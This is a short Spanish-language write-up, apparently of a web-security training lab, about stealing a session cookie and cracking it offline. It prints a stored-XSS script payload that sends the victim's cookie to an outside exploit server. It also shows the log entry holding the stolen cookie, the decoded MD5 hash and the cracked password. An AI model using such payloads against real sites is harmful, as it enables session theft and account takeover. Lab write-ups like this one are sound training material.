10 Offline password cracking
Aqui igualmente obtenemos una cookie conformada por usuario:md5(password) en este caso explotamos XSS almacenado sobre la seccion de comentarios para robar la cookie del usuario carlos con el fin de luego crackear el valor en md5
</textarea><script>document.location="https://exploit-0a5a00bf04bcabbec18d021e016f00be.exploit-server.net/exploit?" + document.cookie</script>
Exfiltramos la cookie con ayuda del exploit server y revisamos los logs
10.0.4.117 2026-02-15 00:10:29 +0000 "GET /exploit?secret=lhoqWftb49sk3Fk06x6l2KYAZBnysPWb;%20stay-logged-in=Y2FybG9zOjI2MzIzYzE2ZDVmNGRhYmZmM2JiMTM2ZjI0NjBhOTQz HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
Al decodificar en base64
carlos:26323c16d5f4dabff3bb136f2460a943
A partir de aqui podemos utilizar hashcat, crackstation o jhon password: onceuponatime